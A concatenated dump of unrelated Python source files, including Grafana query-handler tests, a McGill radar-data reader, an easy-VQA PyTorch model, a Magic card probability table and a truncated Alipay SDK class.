parsed_point = line['datapoints'][i]
parsed_value, parsed_timestamp = parsed_point
self.assertEqual(
raw_point.timestamp,
parsed_timestamp * 1000,
msg='Timestamp must be reduce to microsecond'
)
if type(parsed_value) == str:
self.assertEqual(str(raw_point.value), parsed_value, msg='Parsed point equals str(raw value)')
elif type(parsed_value) == float:
self.assertEqual(float(raw_point.value), parsed_value, msg='Parsed point equals float(raw value)')
else:
self.fail('Parsed points type must be float or str')
def test_parse_results_as_table(self):
results = QueryHandler._parse_results_as_table(self.rows)
expected_result = [{
'columns': [
{
'text': 'timestamp',
'type': 'string'
},
{
'text': 'name',
'type': 'string'
},
{
'text': 'value',
'type': 'string'
}
],
'rows': [
[9876543.210, 'oxygen', 0.001],
[1256903.478, 'laser', 123],
[1000000.000, 'door', True],
[2000000.000, 'file name', 'text'],
[6000000.000, 'oxygen', 0.002],
[7000000.000, 'laser', 0],
[9000000.000, 'door', False]
],
'type': 'table'
}]
self.assertEqual(expected_result, results, msg='Table entries must respect the Grafana contract')
def test_compute_aggregation(self):
some_values = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
self.assertEqual(
45,
QueryHandler._compute_aggregation(some_values, 'sum'),
msg='Sum of all the values'
)
self.assertEqual(
0,
QueryHandler._compute_aggregation(some_values, 'minimum'),
msg='Minimum of all the values'
)
self.assertEqual(
9,
QueryHandler._compute_aggregation(some_values, 'maximum'),
msg='Maximum of all the values'
)
self.assertEqual(
False,
QueryHandler._compute_aggregation(some_values, 'and'),
msg='Boolean and of all the values'
)
self.assertEqual(
True,
QueryHandler._compute_aggregation(some_values, 'or'),
msg='Boolean or of all the values'
)
self.assertEqual(
10,
QueryHandler._compute_aggregation(some_values, 'count'),
msg='Count of all the values'
)
self.assertEqual(
4.5,
QueryHandler._compute_aggregation(some_values, 'average'),
msg='Average of all the values'
)
self.assertEqual(
4.5,
QueryHandler._compute_aggregation(some_values, 'not existing method'),
msg='Default is Average'
)
empty_values = []
self.assertEqual(0, QueryHandler._compute_aggregation(empty_values, 'sum'), msg='Sum on empty array is 0')
with self.assertRaises(ValueError, msg='Minimum on empty array is a ValueError'):
QueryHandler._compute_aggregation(empty_values, 'minimum')
with self.assertRaises(ValueError, msg='Maximum on empty array is a ValueError'):
QueryHandler._compute_aggregation(empty_values, 'maximum')
self.assertEqual(
True,
QueryHandler._compute_aggregation(empty_values, 'and'),
msg='Boolean and on empty array is True'
)
self.assertEqual(
False,
QueryHandler._compute_aggregation(empty_values, 'or'),
msg='Boolean or on empty array is True'
)
self.assertEqual(
0,
QueryHandler._compute_aggregation(empty_values, 'count'),
msg='Count on empty array is 0'
)
with self.assertRaises(ZeroDivisionError, msg='Average on empty array is a ZeroDivisionError'):
QueryHandler._compute_aggregation(empty_values, 'average')
def test_aggregate_datapoint_changes(self):
some_values = [
[1, 1000],
[1, 1001],
[1, 1002],
[2, 1003],
[2, 1004],
[2, 1005],
[3, 1006],
[3, 1007],
[4, 1008],
[1, 1009],
]
unique_values = [
some_values[0],
some_values[3],
some_values[6],
some_values[8],
some_values[9]
]
self.assertEqual(
unique_values,
QueryHandler._aggregate_datapoint_changes(some_values),
msg='Keep only entries when the value change'
)
empty_values = []
self.assertEqual(
empty_values,
QueryHandler._aggregate_datapoint_changes(empty_values),
msg='No entries when no values given'
)
| StarcoderdataPython |
1682249 | <reponame>JaumVitor/HOMEWORK-PYTHON
dia = int ( input ( 'Quantos dias passou com o carro ? '))
km = float ( input ( 'Quantos km foram rodados ? '))
custo = (dia * 60) + (km * 0.15)
print ( 'Valor do aluguel é de R${}'.format(custo ))
| StarcoderdataPython |
6446331 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 8 12:12:30 2020
@author: Rudra
"""
import os
import glob
import torch
path2logs = os.path.join('..', 'logs', 'ritnet')
strSys = 'RC'
cond = [0, 1, 2]
selfCorr = [0, 1]
opDict = {'state_dict':[], 'epoch': 0}
for i in cond:
for j in selfCorr:
strModel = '{}_e2e_{}_{}_0'.format(strSys, i, j)
path2checkpoint = os.path.join(path2logs, strModel, 'checkpoints', 'checkpoint.pt')
netDict = torch.load(path2checkpoint)
if 'state_dict' in netDict.keys():
stateDict = netDict['state_dict']
else:
stateDict = netDict
opDict['state_dict'] = {k: v for k, v in stateDict.items() if 'dsIdentify_lin' not in k}
strOut = '{}_e2e_{}_{}_1'.format(strSys, i, j)
path2checkpoint_out = os.path.join(path2logs, strOut, 'checkpoints', 'checkpoint.pt')
torch.save(opDict, path2checkpoint_out)
print('Success. {} -> {}'.format(path2checkpoint, path2checkpoint_out))
| StarcoderdataPython |
5014488 | """
Feedback package
Takes in a message an an (optional) email address and sends feedback to
e-mail address specified in settings.py
""" | StarcoderdataPython |
6429573 | <reponame>angrybacon/gitaxian-probability<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# flake8: noqa
"""
The SLATE table contains the corresponding flags to each card that is relevant
to Lands as an archetype.
The FORMS table lists all forms for a Manabond into Marit Lage on the first
turn.
"""
SLATE = {
# Business
'Crop Rotation': ('CR',),
'Manabond': ('MB',),
# Mana
'Mox Diamond': ('MD',),
# Lands
'Ancient Tomb': ('L', '2',),
'Blast Zone': ('L', '1',),
'Bojuka Bog': ('L',),
'Dark Depths': ('L', 'DD',),
'Forest': ('L', 'G',),
'Ghost Quarter': ('L', '1',),
'Glacial Chasm': ('L',),
"Hall of Heliod's Generosity": ('L', '1',),
'Horizon Canopy': ('L', '1', 'G', 'W',),
'Karakas': ('L', 'W',),
'Maze of Ith': ('L',),
'Riftstone Portal': ('L', 'RP', '1',),
'Rishadan Port': ('L', '1',),
'Savannah': ('L', 'G', 'W',),
'The Tabernacle at Pendrell Vale': ('L',),
"Thespian's Stage": ('L', 'TS', '1',),
'Tranquil Thicket': ('L',),
'Verdant Catacombs': ('L', 'G', 'W',),
'Wasteland': ('L', '1',),
'Windswept Heath': ('L', 'G', 'W',),
'Wooded Foothills': ('L', 'G', 'W',),
}
FORMS = {
'No Mox Diamond, no Crop Rotation, no Ancient Tomb': [
{'base': ((1, 'MB',), (1, 'DD',), (1, 'TS',), (0, '=MD',), (0, '=CR'), (0, '=2'))},
((1, '=G',), (2, '1|W',),),
((2, '=G',), (1, '1|W',),),
((3, 'G',),),
],
'No Mox Diamond, no Crop Rotation, with Ancient Tomb': [
{'base': ((1, 'MB',), (1, 'DD',), (1, 'TS',), (0, '=MD',), (0, '=CR'))},
((1, '2'), (1, 'G',),),
],
}
| StarcoderdataPython |
9052 | <filename>fastseg/model/utils.py<gh_stars>100-1000
import torch.nn as nn
from .efficientnet import EfficientNet_B4, EfficientNet_B0
from .mobilenetv3 import MobileNetV3_Large, MobileNetV3_Small
def get_trunk(trunk_name):
"""Retrieve the pretrained network trunk and channel counts"""
if trunk_name == 'efficientnet_b4':
backbone = EfficientNet_B4(pretrained=True)
s2_ch = 24
s4_ch = 32
high_level_ch = 1792
elif trunk_name == 'efficientnet_b0':
backbone = EfficientNet_B0(pretrained=True)
s2_ch = 16
s4_ch = 24
high_level_ch = 1280
elif trunk_name == 'mobilenetv3_large':
backbone = MobileNetV3_Large(pretrained=True)
s2_ch = 16
s4_ch = 24
high_level_ch = 960
elif trunk_name == 'mobilenetv3_small':
backbone = MobileNetV3_Small(pretrained=True)
s2_ch = 16
s4_ch = 16
high_level_ch = 576
else:
raise ValueError('unknown backbone {}'.format(trunk_name))
return backbone, s2_ch, s4_ch, high_level_ch
class ConvBnRelu(nn.Module):
"""Convenience layer combining a Conv2d, BatchNorm2d, and a ReLU activation.
Original source of this code comes from
https://github.com/lingtengqiu/Deeperlab-pytorch/blob/master/seg_opr/seg_oprs.py
"""
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0,
norm_layer=nn.BatchNorm2d):
super(ConvBnRelu, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size,
stride=stride, padding=padding, bias=False)
self.bn = norm_layer(out_planes, eps=1e-5)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
| StarcoderdataPython |
1932898 | def func1(func2):
return func2()
def hello():
return 'Olá, mundo'
print(func1(hello))
def func_mestre(f, *args, **kwargs):
return f(*args, **kwargs)
def fala_oi(nome):
return f'Oi, {nome}'
def fala(saud, nome):
return f'{saud}, {nome}'
print(func_mestre(fala_oi, 'João'))
print(func_mestre(fala, 'Olá', 'João')) | StarcoderdataPython |
19607 | <gh_stars>0
'''
Copyright (C) 2016 The Crown (i.e. Her Majesty the Queen in Right of Canada)
This file is an add-on to RAVE.
RAVE is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
RAVE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with RAVE. If not, see <http://www.gnu.org/licenses/>.
'''
##
# McGill format reader
# McGill indices are base 1, except the bin_number!
##
# @file
# @author <NAME>, Environment and Climate Change Canada
# @date 2016-01-22
import time
import _rave, _raveio
import _polarvolume, _polarscan, _polarscanparam
from Proj import dr
from numpy import *
HEADER_LENGTH = 4096
RECORD_LENGTH = 2048
SEGMENT_LENGTH = 19
SEGMENTS = 107
NRAYS = 360
SCANT = 10 # Time in seconds to acquire a sweep.
QUANTITIES = {1 : "DBZH", 4 : "VRADH", 16 : "ZDR", 17 : "PHIDP",
18 : "RHOHV", 19 : "KDP"} # Only 1 and 4 are available
# esteps are the times in seconds between tilts in the ascending scan strategy
# These are real times from an acquisition in April 2012. They are used to
# adjust the timing metadata backwards, as McGill timestamps the end of data
# acquisition. They are indicative only, but the best we can do.
esteps = (0.921875, 0.914062, 0.914062, 1.04688, 0.976562, 1.00000, 0.984375,
1.02344, 1.47656, 1.33594, 1.17188, 1.71094, 2.17188, 2.82812,
3.12500, 3.32031, 3.71875, 3.92969, 4.44531, 4.83594, 5.13281,
5.22656, 5.29688, 0.0) # Last value is a dummy
## Empty generic container, to be populated
# @param object
class McGill(object):
def __init__(self):
pass
## Is this a McGill file?
# @param string containing the input file name
# @returns True if the file is a McGill file, otherwise False
def isMcGill(filename):
fd = open(filename)
s = fd.read(6)
fd.close()
return s == "mcgill"
## Reads the contents of a McGill file, according to
# http://deneb.tor.ec.gc.ca/urpdoc/reference/science/mcgill_volume_scan.html
# Attribute naming follows this document.
# The generic container is used to represent the contents of the file as:
# mobj : top-level McGill() object
# mobj.logical_records : a list of McGill objects containing one logical record each
# mobj.logical_records[index].segments : a list of 107 McGill objects, each
# representing a segment
# @param string input file name
# @returns McGill object representing the file contents
def readMcGill(filename):
mobj = McGill()
fd = open(filename)
# Start reading header
fd.seek(46*2)
#mobj.dum0 = fd.read(46*2)
mobj.number_Logical_Records = int(fromstring(fd.read(2), int16))
fd.seek(3*2, 1)
#mobj.dum1 = fd.read(3*2)
mobj.Volume_Scan_Format = int(fromstring(fd.read(2), int16))
fd.seek(5*2, 1)
#mobj.dum2 = fd.read(2*5)
mobj.hours = int(fromstring(fd.read(4), int32))
mobj.minutes = int(fromstring(fd.read(4), int32))
mobj.seconds = int(fromstring(fd.read(4), int32))
mobj.day = int(fromstring(fd.read(4), int32))
mobj.month = int(fromstring(fd.read(4), int32))
mobj.year = int(fromstring(fd.read(4), int32))
mobj.radar_Id = int(fromstring(fd.read(4), int32))
mobj.radar_latitude = float(fromstring(fd.read(4), float32))
mobj.radar_longitude = float(fromstring(fd.read(4), float32))
mobj.number_elevations = int(fromstring(fd.read(4), int32))
mobj.elevation_angles = []
for i in range(mobj.number_elevations):
mobj.elevation_angles.append(float(fromstring(fd.read(4), float32)))
mobj.azimuth_offset = int(fromstring(fd.read(2), int16))
mobj.viraq_flag = fd.read(2)
mobj.clutter_filter = fd.read(2)
fd.seek(315*2, 1)
#mobj.dum3 = fd.read(315*2)
mobj.met_param = int(fromstring(fd.read(2), int16))
fd.seek(2 ,1)
#mobj.dum4 = fd.read(2)
mobj.value_offset = float(fromstring(fd.read(4), float32))
mobj.cal_slope = float(fromstring(fd.read(4), float32))
mobj.antenna_programme = int(fromstring(fd.read(2), int16))
fd.seek(4, 1)
#mobj.dum5 = fd.read(2)
#mobj.dum6 = fd.read(2)
mobj.cscan_format = int(fromstring(fd.read(2), int16))
mobj.range_unfolded = int(fromstring(fd.read(2), int16))
mobj.vad_velocity_unfolded = int(fromstring(fd.read(2), int16))
mobj.numb_vad_unf_pts = []
for i in range(mobj.number_elevations):
mobj.numb_vad_unf_pts.append(int(fromstring(fd.read(2), int16)))
mobj.numb_range_unf_pts = []
for i in range(mobj.number_elevations):
mobj.numb_range_unf_pts.append(int(fromstring(fd.read(2), int16)))
mobj.range_bins_array_size = int(fromstring(fd.read(2), int16))
fd.seek(2, 1)
#mobj.dum7 = fd.read(2)
mobj.shift_cscan_flag = int(fromstring(fd.read(2), int16))
mobj.shift_speed = int(fromstring(fd.read(2), int16))
mobj.shift_dir = int(fromstring(fd.read(2), int16))
fd.seek(48*4, 1)
#mobj.dum8 = fd.read(24*4)
#mobj.dum9 = fd.read(24*4)
mobj.vert_grad_unfolded = int(fromstring(fd.read(2), int16))
mobj.numb_vert_grad_unf_pts = []
for i in range(mobj.number_elevations):
mobj.numb_vert_grad_unf_pts.append(int(fromstring(fd.read(2), int16)))
fd.seek(12, 1)
#mobj.dum10 = fd.read(4) # documentation says 2 bytes, but it's 4
#mobj.dum11 = fd.read(4)
#mobj.dum12 = fd.read(4)
mobj.radial_grad_unfolded = int(fromstring(fd.read(2), int16))
mobj.numb_radial_grad_unf_pts = []
for i in range(mobj.number_elevations):
mobj.numb_radial_grad_unf_pts.append(int(fromstring(fd.read(2), int16)))
mobj.prf1 = []
for i in range(mobj.number_elevations):
mobj.prf1.append(int(fromstring(fd.read(2), int16)))
mobj.prf2 = []
for i in range(mobj.number_elevations):
mobj.prf2.append(int(fromstring(fd.read(2), int16)))
mobj.nyq_range = []
for i in range(mobj.number_elevations):
mobj.nyq_range.append(int(fromstring(fd.read(2), int16)))
mobj.max_range = []
for i in range(mobj.number_elevations):
mobj.max_range.append(int(fromstring(fd.read(2), int16)))
mobj.nyq_vel = []
for i in range(mobj.number_elevations):
mobj.nyq_vel.append(float(fromstring(fd.read(4), float32)))
mobj.max_vel = []
for i in range(mobj.number_elevations):
mobj.max_vel.append(float(fromstring(fd.read(4), float32)))
mobj.usable_elv = []
for i in range(mobj.number_elevations):
mobj.usable_elv.append(int(fromstring(fd.read(1), uint8)))
mobj.prev_sub_area_speed, mobj.prev_sub_area_dir = [], []
for i in range(9):
mobj.prev_sub_area_speed.append(int(fromstring(fd.read(2), int16)))
for i in range(9):
mobj.prev_sub_area_dir.append(int(fromstring(fd.read(2), int16)))
#mobj.dum_pad = fd.read(1166*2)
# Start reading data, by logical record
mobj.logical_records = []
fd.seek(HEADER_LENGTH)
last_record = 0
while last_record == 0:
lr = McGill()
record = fd.read(RECORD_LENGTH)
lr.high = int(fromstring(record[0], uint8))
lr.low = int(fromstring(record[1], uint8))
lr.logical_record_number = 64 * lr.high + lr.low
last_record = int(fromstring(record[2], uint8))
lr.beginning_elevation_number = int(fromstring(record[3], uint8))
lr.end_elevation_number = int(fromstring(record[4], uint8))
lr.segstr = record[14:2047]
lr.segments = []
# Read SEGMENTS, each SEGMENT_LENGTH bytes long.
segpos = 0
for i in range(SEGMENTS):
seg = McGill()
this_seg = lr.segstr[segpos:segpos+SEGMENT_LENGTH]
seg.N = int(fromstring(this_seg[0], uint8))
# Data segment
if 1 <= seg.N <= 30:
seg.type = "data"
seg.high = int(fromstring(this_seg[1], uint8))
seg.low = int(fromstring(this_seg[2], uint8))
seg.bin_number = 16 * (seg.N - 1)# + 1
seg.radial_number = 64 * seg.high + seg.low
seg.data = fromstring(this_seg[3:], uint8)
# Elevation segment
elif 31 <= seg.N <= 55:
seg.type = "elevation"
seg.elevation_number = seg.N - 31
seg.elevation_angle = mobj.elevation_angles[seg.elevation_number-1]
# End-of-data segment can be ignored
elif seg.N == 63:
seg.type = "eod"
# For some reason, there are segments of type 0, which are
# undocumented. Ignore these.
if seg.N > 0:
lr.segments.append(seg)
segpos += SEGMENT_LENGTH
mobj.logical_records.append(lr)
fd.close()
return mobj
## Takes the output of readMcGill and creates contiguous scans of data.
# This is done by pasting the contents of each McGill segment into the
# equivalent position in the corresponding contiguous scan.
# @param McGill object representing file contents
def makeScans(mobj):
mobj.scans = []
# Create empty arrays for each scan
for i in range(mobj.number_elevations):
mobj.scans.append(zeros((NRAYS, 120+(60*2)+(60*4)), uint8))
# Populate them
for lr in mobj.logical_records:
for seg in lr.segments:
# Elevation segment types always preceed data types
if seg.type == "elevation":
scan = seg.elevation_number -1
elif seg.type == "data":
ray = seg.radial_number - 1
# Bins 112-119 are 1 km, 120-128 are 2 km, 112-135 km
if seg.bin_number == 112:
part1 = seg.data[:8]
part2 = repeat(seg.data[8:], 2)
data = concatenate([part1, part2])
frombin = 112
# All 2 km, 136-231 km
elif 128 <= seg.bin_number < 176:
data = repeat(seg.data, 2)
diff = (seg.bin_number - 128) / 16.0
frombin = 136 + 32 * diff # 16 and 32 combo makes no sense?
# Bins 176-179 are 2 km, 180-239 are 4 km, 232-287 km
elif seg.bin_number == 176:
part1 = repeat(seg.data[:4], 2)
part2 = repeat(seg.data[4:], 4)
data = concatenate([part1, part2])
frombin = 232
# All 4 km, 288- km
elif 192 <= seg.bin_number:
data = repeat(seg.data, 4)
diff = (seg.bin_number - 192) / 32.0
frombin = 288 + 64 * diff # 32 and 64 combo makes no sense?
# All 1 km, 0-111 km
else:
data = seg.data
frombin = seg.bin_number
tobin = int(frombin) + len(data)
mobj.scans[scan][ray][frombin:tobin] = data
## McGill data times are the end of data acquisition. This function guestimates
# the beginning dates and times of each scan in the volume.
# @param McGill object representing file contents
def adjustTimes(mobj):
startdate, starttime, enddate, endtime = [], [], [], []
tt = (mobj.year, mobj.month, mobj.day,
mobj.hours, mobj.minutes, mobj.seconds, 0, 0, 0)
epochs = time.mktime(tt) - (sum(esteps) + SCANT*mobj.number_elevations)
for i in range(mobj.number_elevations):
start = time.gmtime(epochs)
startdate.append(time.strftime("%Y%m%d", start))
starttime.append(time.strftime("%H%M%S", start))
epochs += SCANT
end = time.gmtime(epochs)
enddate.append(time.strftime("%Y%m%d", end))
endtime.append(time.strftime("%H%M%S", end))
epochs += esteps[i]
mobj.startdate = startdate
mobj.starttime = starttime
mobj.enddate = enddate
mobj.endtime = endtime
## Creates a PVOL from the McGill object
# @param McGill object representing file contents
# @returns BALTRAD/ODIM PVOL object
def makePVOL(mobj):
pvol = _polarvolume.new()
pvol.source = "NOD:cawmn,PLC:McGill QC"
pvol.longitude = mobj.radar_longitude * dr
pvol.latitude = mobj.radar_latitude * dr
pvol.height = 76.0 # From a URP Site.conf file
pvol.beamwidth = 0.85 * dr # From a URP Site.conf file
pvol.date = mobj.startdate[0]
pvol.time = mobj.starttime[0]
pvol.addAttribute("how/simulated", "False")
pvol.addAttribute("how/system", "McGill")
pvol.addAttribute("how/TXtype", "klystron")
pvol.addAttribute("how/polmode", "simultaneous-dual")
pvol.addAttribute("how/wavelength", 10.4) # According to the McGill spec
pvol.addAttribute("how/rpm", 6.0) # According to the McGill spec
for i in range(mobj.number_elevations):
scan = _polarscan.new()
scan.elangle = mobj.elevation_angles[i] * dr
scan.rscale = 1000.0
scan.rstart = 0.25 # According to URP decoder
scan.a1gate = 0 # Unknown
scan.startdate = mobj.startdate[i]
scan.starttime = mobj.starttime[i]
scan.enddate = mobj.enddate[i]
scan.endtime = mobj.endtime[i]
scan.addAttribute("how/astart", 0.5) # According to the McGill spec
scan.addAttribute("how/lowprf", mobj.prf1[i]) # PRFs are identical
#scan.addAttribute("how/midprf", )
scan.addAttribute("how/highprf", mobj.prf2[i])
param = _polarscanparam.new()
param.quantity = QUANTITIES[mobj.met_param] # Only DBZH and VRADH
param.nodata = 255.0 # Unknown
param.undetect = 0.0 # Implied
param.gain = mobj.cal_slope
param.offset = mobj.value_offset
param.setData(mobj.scans[i])
scan.addParameter(param)
pvol.addScan(scan)
return pvol
## Each PVOL contains only one moment, so merge several of these into one.
# Assume the first PVOL contains DBZH and the second VRADH.
# @param list of (two) PVOLs
# @returns PVOL object containing (both) moments per scan.
def mergePVOLs(pvols):
refl, wind = pvols
for i in range(wind.getNumberOfScans()):
zscan, vscan = refl.getScan(i), wind.getScan(i)
vradh = vscan.getParameter("VRADH")
zscan.addParameter(vradh)
return refl
## Reads McGill data from file and returns a BALTRAD/ODIM PVOL object for a
# single moment
# @param string of McGill file
# @returns PVOL object containing one moment for each scan.
def file2pvol(filename):
mobj = readMcGill(filename)
makeScans(mobj)
adjustTimes(mobj)
return makePVOL(mobj)
## Reads McGill data from two files into a single BALTRAD/ODIM PVOL
# @param string of the McGill file containing reflectivity (DBZH)
# @param string of the McGill file containing radial wind velocity (VRADH)
# @returns PVOL object containing both moments per scan
def read(zfile, vfile):
refl = file2pvol(zfile)
wind = file2pvol(vfile)
return mergePVOLs([refl, wind])
if __name__=="__main__":
pass
| StarcoderdataPython |
1640124 | <reponame>sikaiyin/easy-VQA-Pytorch<filename>model.py
from __future__ import print_function
import argparse
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.image import load_img, img_to_array
import json
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from skimage import io, transform
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 80, 3, 1)
self.conv2 = nn.Conv2d(80, 160, 3, 1)
self.conv3 = nn.Conv2d(160, 32, 3, 1)
self.conv4 = nn.Conv2d(32, 32, 3, 1)
self.maxpool1 = nn.MaxPool2d(2)
self.maxpool2 = nn.MaxPool2d(2)
self.maxpool3 = nn.MaxPool2d(2)
self.fc1 = nn.Linear(5408, 32)
self.fcq1 = nn.Linear(27, 320)
self.fcq2 = nn.Linear(320, 32)
self.fc2 = nn.Linear(32, 13)
self.fc3 = nn.Linear(13, 13)
def forward(self, im_input, q_input, big_model):
x1 = self.conv1(im_input)
x1 = self.maxpool1(x1)
x1 = self.conv2(x1)
x1 = self.conv3(x1)
x1 = self.maxpool2(x1)
if big_model:
x1 = self.conv4(x1)
x1 = self.maxpool3(x1)
x1 = torch.flatten(x1, 1)
x1 = self.fc1(x1)
x1 = F.tanh(x1)
x2 = self.fcq1(q_input)
x2 = F.tanh(x2)
x2 = self.fcq2(x2)
x2 = F.tanh(x2)
combined_feature = torch.mul(x1, x2) # [batch_size, embed_size]
pred = self.fc2(combined_feature)
pred = F.tanh(pred)
pred = self.fc3(pred)
return pred
class MyDataset(Dataset):
def __init__(self, path, transform=None):
self.root_path = path
self.image_path = os.path.join(self.root_path, 'images')
self.question_path = os.path.join(self.root_path, 'questions.json')
self.texts, self.answers, self.image_ids = self.read_questions(self.question_path)
self.img_paths = self.extract_paths(self.image_path)
self.transform = transform
self.all_answers = self.read_answers(os.path.join(self.root_path, '../answers.txt'))
tokenizer = Tokenizer()
tokenizer.fit_on_texts(self.texts)
self.text_seqs = tokenizer.texts_to_matrix(self.texts)
self.answer_indices = [self.all_answers.index(a) for a in self.answers]
def read_questions(self, path):
with open(path, 'r') as file:
qs = json.load(file)
texts = [q[0] for q in qs]
answers = [q[1] for q in qs]
image_ids = [q[2] for q in qs]
return texts, answers, image_ids
def read_answers(self, path):
with open(path, 'r') as file:
all_answers = [a.strip() for a in file]
return all_answers
def extract_paths(self, dirctory):
paths = {}
for filename in os.listdir(dirctory):
if filename.endswith('.png'):
image_id = int(filename[:-4])
paths[image_id] = os.path.join(dirctory, filename)
return paths
def __len__(self):
return len(self.answers)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
image = img_to_array(load_img(self.img_paths[self.image_ids[idx]]))
if self.transform:
image = self.transform(image)
sample = {'image': image, 'question': torch.Tensor(self.text_seqs[idx])}
target = torch.LongTensor([self.answer_indices[idx]])
return sample, target
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
for batch_idx, (sample, label) in enumerate(train_loader):
correct_train = 0
img, ques, target = sample['image'].to(device), sample['question'].to(device), label.to(device)
target = target.view(ques.shape[0])
optimizer.zero_grad()
output = model(img, ques, False)
NLL = nn.CrossEntropyLoss()
loss = NLL(output, target)
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct_train += pred.eq(target.view_as(pred)).sum().item()
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\n'.format(
epoch, batch_idx * len(ques), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
print("Accuracy: {}%\n".format(correct_train / len(ques)))
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for batch_idx, (sample, label) in enumerate(test_loader):
img, ques, target = sample['image'].to(device), sample['question'].to(device), label.to(device)
target = target.view(ques.shape[0])
output = model(img, ques, False)
NLL = nn.CrossEntropyLoss()
test_loss += NLL(output, target).item()# sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Easy-VQA Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=64, metavar='N',
help='input batch size for testing (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=1e-4, metavar='LR',
help='learning rate (default: 1e-4)')
parser.add_argument('--gamma', type=float, default=0.1, metavar='M',
help='Learning rate step gamma (default: 0.1)')
parser.add_argument('--dry-run', action='store_true', default=False,
help='quickly check a single pass')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--gpu', default=False,
help='GPU usage (default: False))')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=True,
help='For Saving the current Model')
args = parser.parse_args()
torch.manual_seed(args.seed)
device = torch.device('cuda' if (torch.cuda.is_available() and args.gpu) else 'cpu')
train_kwargs = {'batch_size': args.batch_size}
test_kwargs = {'batch_size': args.test_batch_size}
if torch.cuda.is_available():
cuda_kwargs = {'num_workers': 1,
'pin_memory': True}
train_kwargs.update(cuda_kwargs)
test_kwargs.update(cuda_kwargs)
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.90441555, 0.90574956, 0.89646965), (0.19336925, 0.18681642, 0.20578428))
])
dataset1 = MyDataset('./data/train', transform)
dataset2 = MyDataset('./data/test', transform)
train_loader = torch.utils.data.DataLoader(dataset1, shuffle=False, num_workers=4, **train_kwargs)
test_loader = torch.utils.data.DataLoader(dataset2, shuffle=False, num_workers=4, **test_kwargs)
print("The length of train_loader is {}, and test_loader is {}".format(len(train_loader), len(test_loader)))
model = Net().to(device)
optimizer = optim.Adam(model.parameters())
scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
for epoch in range(1, args.epochs + 1):
train(args, model, device, train_loader, optimizer, epoch)
test(model, device, test_loader)
scheduler.step()
if args.save_model:
torch.save(model.state_dict(), "model.pt")
if __name__ == '__main__':
main()
| StarcoderdataPython |
366292 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ExtendParams import ExtendParams
from alipay.aop.api.domain.GoodsDetail import GoodsDetail
from alipay.aop.api.domain.SettleInfo import SettleInfo
from alipay.aop.api.domain.SubMerchant import SubMerchant
class OrderDetail(object):
def __init__(self):
self._app_id = None
self._body = None
self._extend_params = None
self._goods_detail = None
self._out_trade_no = None
self._passback_params = None
self._product_code = None
self._seller_id = None
self._seller_logon_id = None
self._settle_info = None
self._show_url = None
self._sub_merchant = None
self._subject = None
self._total_amount = None
@property
def app_id(self):
return self._app_id
@app_id.setter
def app_id(self, value):
self._app_id = value
@property
def body(self):
return self._body
@body.setter
def body(self, value):
self._body = value
@property
def extend_params(self):
return self._extend_params
@extend_params.setter
def extend_params(self, value):
if isinstance(value, ExtendParams):
self._extend_params = value
else:
self._extend_params = ExtendParams.from_alipay_dict(value)
@property
def goods_detail(self):
return self._goods_detail
@goods_detail.setter
def goods_detail(self, value):
if isinstance(value, list):
self._goods_detail = list()
for i in value:
if isinstance(i, GoodsDetail):
self._goods_detail.append(i)
else:
self._goods_detail.append(GoodsDetail.from_alipay_dict(i))
@property
def out_trade_no(self):
return self._out_trade_no
@out_trade_no.setter
def out_trade_no(self, value):
self._out_trade_no = value
@property
def passback_params(self):
return self._passback_params
@passback_params.setter
def passback_params(self, value):
self._passback_params = value
@property
def product_code(self):
return self._product_code
@product_code.setter
def product_code(self, value):
self._product_code = value
@property
def seller_id(self):
return self._seller_id
@seller_id.setter
def seller_id(self, value):
self._seller_id = value
@property
def seller_logon_id(self):
return self._seller_logon_id
@seller_logon_id.setter
def seller_logon_id(self, value):
self._seller_logon_id = value
@property
def settle_info(self):
return self._settle_info
@settle_info.setter
def settle_info(self, value):
if isinstance(value, SettleInfo):
self._settle_info = value
else:
